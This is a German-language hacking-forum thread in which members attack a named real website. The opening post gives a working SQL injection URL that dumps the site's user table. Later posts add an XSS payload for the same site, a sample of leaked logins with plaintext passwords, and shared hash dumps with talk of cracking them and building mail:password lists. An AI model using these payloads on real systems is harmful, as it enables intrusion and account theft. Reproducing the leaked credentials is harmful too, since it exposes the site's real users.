Zum Inhalt wechseln

Als Gast hast du nur eingeschränkten Zugriff!


Anmelden 

Benutzerkonto erstellen

Du bist nicht angemeldet und hast somit nur einen sehr eingeschränkten Zugriff auf die Features unserer Community.
Um vollen Zugriff zu erlangen musst du dir einen Account erstellen. Der Vorgang sollte nicht länger als 1 Minute dauern.

  • Antworte auf Themen oder erstelle deine eigenen.
  • Schalte dir alle Downloads mit Highspeed & ohne Wartezeit frei.
  • Erhalte Zugriff auf alle Bereiche und entdecke interessante Inhalte.
  • Tausche dich mich anderen Usern in der Shoutbox oder via PN aus.
 

   

Foto

SQLI - bluvista.arcor.de

- - - - -

  • Bitte melde dich an um zu Antworten
15 Antworten in diesem Thema

#1
x4r4x

x4r4x

    Script Kiddie

  • Members
  • PIPPIPPIPPIP
  • Likes
    47
  • 46 Beiträge
  • 15 Bedankt
http://bluvista.arcor.de/gameshow/games/index.php?game_id=1

Query:

http://bluvista.arcor.de/gameshow/games/index.php?game_id=0' union select (select concat_ws(0x203a20,ifnull(cast(id as char),0x20),ifnull(cast(isenabled as char),0x20),ifnull(cast(login as char),0x20),ifnull(cast(pass as char),0x20)) from bluvista.users limit 0,1),2,3,4,5 -- -

RcrHQny.png

 

Dump:

Please Login HERE or Register HERE to see this link!


  • umarex, B1nary, Crap und 2 anderen gefällt das

Thanked by 3 Members:
parisdefr , umarex , lNobodyl

#2
lNobodyl

lNobodyl

    Hacktivist

  • Premium Member
  • Likes
    55
  • 67 Beiträge
  • 22 Bedankt
  • iPhone
  • Windows, Mac OS

XSS auch da.

bluvista.arcor.de/gameshow/games/index.php?game_id=0");</script><img src=x onerror=alert(document.domain) />

089edfde32ad80d7358c155412241df9.png


Kind regards,

Nobody

nobody@xmpp.ninja


#3
Sergejbekas

Sergejbekas

    Script Kiddie

  • Members
  • PIPPIPPIPPIP
  • Likes
    39
  • 32 Beiträge
  • 138 Bedankt
  • Android [root], iPhone
  • Windows, Linux

110k Users, aber "Passwörter" sind in SHA-512

 

:( :( :(


9e33ba829e8a665a690579f2feac4412.png


#4
Ch!ller

Ch!ller

    Shinigami

  • SubMod
  • PIPPIPPIPPIPPIPPIPPIPPIPPIPPIP
  • Likes
    957
  • 896 Beiträge
  • 1385 Bedankt
  • Spender
  • verifiziert

sind auf jeder Subdomain Vuln ;)

 

ein paar davon findet man hier im Elite


Bearbeitet von Ch!ller, 31 October 2015 - 21:26 Uhr.

  • Sergejbekas gefällt das
Alle Angaben und Informationen dienen lediglich der Theorie!

#5
Sergejbekas

Sergejbekas

    Script Kiddie

  • Members
  • PIPPIPPIPPIP
  • Likes
    39
  • 32 Beiträge
  • 138 Bedankt
  • Android [root], iPhone
  • Windows, Linux

sind auf jeder Subdomain Vuln ;)

 

ein paar davon findet man hier im Elite

Du meinst im Elite Thread? Wie kommt man rein? Bewerbung?

 

sorry für offtop


Bearbeitet von Sergejbekas, 31 October 2015 - 21:39 Uhr.

9e33ba829e8a665a690579f2feac4412.png


#6
Ch!ller

Ch!ller

    Shinigami

  • SubMod
  • PIPPIPPIPPIPPIPPIPPIPPIPPIPPIP
  • Likes
    957
  • 896 Beiträge
  • 1385 Bedankt
  • Spender
  • verifiziert

Du meinst im Elite Thread? Wie kommt man rein? Bewerbung?

 

sorry für offtop

 

Ich meine den Elite Bereich, wie man Elite wird erfährst du hier


Alle Angaben und Informationen dienen lediglich der Theorie!

Thanked by 1 Member:
Sergejbekas

#7
x4r4x

x4r4x

    Script Kiddie

  • Members
  • PIPPIPPIPPIP
  • Likes
    47
  • 46 Beiträge
  • 15 Bedankt

@lNobodyl:

 

Das mit der XSS ist nicht weiter verwunderlich.

Wo eine SQLi ist, findet sich auch meistens eine XSS.

 

@Topic:

Den Dump lade ich später auch hoch, insofern ich dazu Zeit habe.


  • Ch!ller und Caruso gefällt das

Thanked by 1 Member:
suceone

#8
Toolbase

Toolbase

    Lamer

  • Banned
  • PIPPIPPIP
  • Likes
    0
  • 16 Beiträge
  • 3 Bedankt

Mit welchem programm könnte mann die passwörter am besten cracken?

hab 20k mit ORHT cracken lassen jedoch wurden von 20k nur 50 pw gefunden

Kennt ihr ein programm was auch dem cracken die txt datei in dem format erstelt Usermail:Passwort ohne denn hash?

 

Lg

Toolbase



#9
x4r4x

x4r4x

    Script Kiddie

  • Members
  • PIPPIPPIPPIP
  • Likes
    47
  • 46 Beiträge
  • 15 Bedankt

Dump im Main-Post hinzugefügt!


  • Cube gefällt das

#10
B1nary

B1nary

    Samurai

  • Elite Member
  • Likes
    489
  • 506 Beiträge
  • 346 Bedankt

DIe Passwörter sind leicht, dürften schnell durchlaufen. Hab mal ne Handvoll testweise probiert:

id,isenabled,login,pass

100,1,micha,micha
101,1,micha16,micha16
104,1,stephan,stephan
106,1,paul,paule
107,1,paul,paule
124,1,stephan3,stephan3
125,1,dsf,asd
132,1,micha18,micha
134,1,chriss,carpenoctem
135,1,robbe,robbe
136,1,marco16,testtest
120,1,m\\?e4cha,micha
...

Danke x4r4x für's Bereitstellen!

 

Edit:

Hab die Liste mal aufbereitet und mit username:hash zur Verfügung gestellt:

Please Login HERE or Register HERE to see this link!


  • x4r4x gefällt das

Thanked by 1 Member:
Sergejbekas

#11
Sergejbekas

Sergejbekas

    Script Kiddie

  • Members
  • PIPPIPPIPPIP
  • Likes
    39
  • 32 Beiträge
  • 138 Bedankt
  • Android [root], iPhone
  • Windows, Linux
 

Wenn ihr das schon macht, wieso holt niemand E-mail:pass liste?

PS Hat mich nur gewundert... Was kann ich denn nun mit login:pass anfangen, ausser paar Service zu "Bruten"


9e33ba829e8a665a690579f2feac4412.png


#12
myman

myman

    Hacker

  • Premium Member
  • Likes
    143
  • 202 Beiträge
  • 101 Bedankt

 

 

Wenn ihr das schon macht, wieso holt niemand E-mail:pass liste?

PS Hat mich nur gewundert... Was kann ich denn nun mit login:pass anfangen, ausser paar Service zu "Bruten"

 

Ähm das ist ja eigentlich nur Kauderwelsch. Eine mail:pass liste holt man nicht - die macht man. Dafür muss man erstmal die Hashes cracken.

Wenn man das schon gemacht hat braucht man die Services auch nicht mehr "Bruten" weil man die Logins dafür ja schon hat. Dann wäre eMails Grabben und nach X Filtern die bessere Wahl. Überflieg noch mal schnell 1-2 Basics dann erklärt sich das meiste hier von alleine.



#13
Hydra

Hydra

    Hashkiller

  • Members
  • PIPPIPPIPPIPPIP
  • Likes
    25
  • 61 Beiträge
  • 25 Bedankt
  • verifiziert
  • Android [root]
  • Windows, Linux

Ich fang mal an zu knacken.



Thanked by 1 Member:
Toolbase

#14
x4r4x

x4r4x

    Script Kiddie

  • Members
  • PIPPIPPIPPIP
  • Likes
    47
  • 46 Beiträge
  • 15 Bedankt

Schon lustig hier.

Schreibt man mal was neues, behauptet doch gleich der erste mental retardierte User man hätte es geklaut:

 

 

 

kHwgt6w.png

 

 

 

Nur schade, dass sich dazu rein garnichts finden lässt oder?:

Please Login HERE or Register HERE to see this link!


Bearbeitet von x4r4x, 01 November 2015 - 15:53 Uhr.

  • lNobodyl und myman gefällt das

#15
umarex

umarex

    Noob

  • Banned
  • PIPPIP
  • Likes
    2
  • 4 Beiträge
  • 10 Bedankt

Warum hat denn keiner Mail:Hash gedumpt?

Naja hier:

Please Login HERE or Register HERE to see this link!

 

Und hier ca 70% cracked :

Versteckter Inhalt
Klicke auf den Danke-Button um den versteckten Inhalt sehen zu können. Nur registrierte Mitglieder haben Zugriff hierauf.


  • xFAUSTx und x4r4x gefällt das

Thanked by 9 Members:
nninja , xFAUSTx , isi , SYS64738 , Injection , xVirtu , Cube , Commentor , MarkSantos

#16
myman

myman

    Hacker

  • Premium Member
  • Likes
    143
  • 202 Beiträge
  • 101 Bedankt

Ich bin bei 95,8% cracked und es wird echt heftlig langsam =)

 

Schon jemand mehr als ich ?

 

Hier mal meine 95,8% als Plains. Ich gebe keine Mail:Pass Liste raus damit das nicht irgendwer direkt in nen MailGrabber pumpt. Kann ja jeder damit machen was er will.

 

Versteckter Inhalt
Klicke auf den Danke-Button um den versteckten Inhalt sehen zu können. Nur registrierte Mitglieder haben Zugriff hierauf.



Thanked by 8 Members:
hanshenkelman , nninja , Pseudo , xFAUSTx , koksta , isi , SYS64738 , iggl


  Thema Forum Themenstarter Statistik Letzter Beitrag

Besucher die dieses Thema lesen:

Mitglieder: , Gäste: , unsichtbare Mitglieder:


This topic has been visited by 99 user(s)


    , <cerrno>, 133TFoX, 1x1, alexlehm, B1nary, Backdoored, Benutzer, Bojka, brilla, bumg2, Bypass, byte, can, Caruso, casamonica, Ch!ller, chick0n, chick0n11, Commentor, Crap, Cube, cX., cyberbitch, CyberFlash, DarkICE, DataBase, Dr. Spic, DR.zydz, Eester, eXact, Exynos, fAYe, ferithan, Framerater, frechdax, Goooofy, GoWest, hacked, hanshenkelman, Hydra, iggl, Injection, Irhabi, isi, izibitzi, k0val, kafkas, Keeper, Klopfer, koksta, Kozuki, Laggy, len0, lNobodyl, Lorenzo, MarkSantos, MDDD, mister-miyagi, most_uniQue, MrTecc, mullman, Neonxen, nischke, nninja, Norky, notfound, pdr0, Phalanx, ponycrew, pornoralle, Pseudo, R3s1stanc3, SavE1, secretary, Sergejbekas, Skymort, Slixer, smc2014, sngglr, sniffer, superuser123, SYS64738, the.3nd, Toolbase, Traxx, twixeis, UDXR, umarex, vital, why0, x4r4x, xFAUSTx, xl3iitches, xVirtu, Yasunai, zepsus, Zero-X, ZeroFreez
Die besten Hacking Tools zum downloaden : Released, Leaked, Cracked. Größte deutschsprachige Hacker Sammlung.